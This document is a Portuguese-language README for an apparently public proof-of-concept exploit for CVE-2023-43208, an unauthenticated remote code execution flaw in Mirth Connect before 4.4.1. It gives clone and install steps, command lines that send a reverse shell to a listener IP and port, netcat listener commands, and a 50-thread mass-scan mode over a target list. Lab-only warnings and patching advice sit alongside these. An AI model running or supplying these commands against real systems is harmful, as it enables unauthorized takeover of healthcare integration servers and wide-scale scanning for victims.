
Um exploit de prova de conceito para CVE-2023-43208, uma vulnerabilidade de execução remota de código no Mirth Connect anterior à versão 4.4.1.
⚠️ APENAS PARA FINS EDUCACIONAIS E DE LABORATÓRIO ⚠️
Um exploit de prova de conceito para CVE-2023-43208, uma vulnerabilidade de execução remota de código no Mirth Connect anterior à versão 4.4.1.
Esta ferramenta é estritamente para:
NÃO USE:
Você é responsável por cumprir todas as leis e regulamentos aplicáveis. O uso indevido desta ferramenta pode resultar em acusações criminais.
Este exploit visa a vulnerabilidade de desserialização de XML no endpoint /api/users do Mirth Connect, permitindo execução remota de código não autenticada em versões afetadas (< 4.4.1).
Esta é uma vulnerabilidade CRÍTICA e deve ser testada APENAS em ambientes de laboratório isolados com seus próprios sistemas.
requirements.txtgit clone https://github.com/M0h4/CVE-2023-43208-EXPLOIT.git cd CVE-2023-43208-EXPLOIT
pip install -r requirements.txt 💻 Uso (APENAS PARA LABORATÓRIO) Modo Interativo (Recomendado para Laboratório) bash python exploit.py Modo Linha de Comando bash
python exploit.py -u https://target:8443 -lh 10.10.14.5 -lp 4444
python exploit.py -f targets.txt -t 50 -o vulnerable.txt
python exploit.py -u https://target:8443 -lh 10.10.14.5 -lp 4444 --no-interactive Opções text -u, --url URL do alvo a explorar (APENAS PARA LABORATÓRIO) -lh, --lhost Host de escuta (seu IP) -lp, --lport Porta de escuta -f, --file Arquivo contendo URLs de alvos para escanear -o, --output Arquivo de saída para salvar os resultados da varredura -t, --threads Número de threads para varredura (padrão: 50) --no-interactive Executar em modo não interativo 🎯 Exemplo de Ambiente de Laboratório Configure seu laboratório:
Instale a versão vulnerável do Mirth Connect (< 4.4.1) em uma VM isolada
Use uma rede controlada (ex.: NAT/Somente-hospedeiro no VirtualBox/VMware)
Nunca exponha à internet
Inicie seu listener:
ncat -lnvp 4444
nc -lnvp 4444 Execute o exploit em seu laboratório:
python exploit.py -u https://192.168.1.100:8443 -lh 192.168.1.50 -lp 4444 🧪 Requisitos do Ambiente de Teste Rede/VLAN isolada
Apenas máquinas virtuais
Nenhum dado de produção
Regras de firewall bloqueando acesso externo
Autorização adequada documentada
📝 Detalhes Técnicos Tipo de Vulnerabilidade: Desserialização XML RCE
Versões Afetadas: Mirth Connect < 4.4.1
Versão Corrigida: 4.4.1 e superiores
Pontuação CVSS: 9.8 (Crítica)
Vetor de Ataque: Rede
Autenticação: Nenhuma necessária
O exploit usa gadgets do Commons Collections para alcançar RCE através do endpoint /api/users.
🛡️ Medidas de Proteção Se você está executando o Mirth Connect:
✅ Atualize para a versão 4.4.1 ou posterior
✅ Restrinja o acesso de rede às interfaces administrativas
✅ Implemente autenticação adequada
✅ Monitore por payloads XML suspeitos
👥 Créditos Autores Originais: K3ysTr0K3R & Chocapikk
Modificado por: M0h4
CVE: CVE-2023-43208
⚠️ AVISO FINAL
╔══════════════════════════════════════════════════════════════╗ ║ ESTA FERRAMENTA É APENAS PARA USO EM LABORATÓRIO ║ ║ O uso não autorizado é ILEGAL e ANTIÉTICO ║ ║ Você assume TODO o risco e responsabilidade ║ ║ O autor NÃO aceita responsabilidade por uso indevido ║ ╚══════════════════════════════════════════════════════════════╝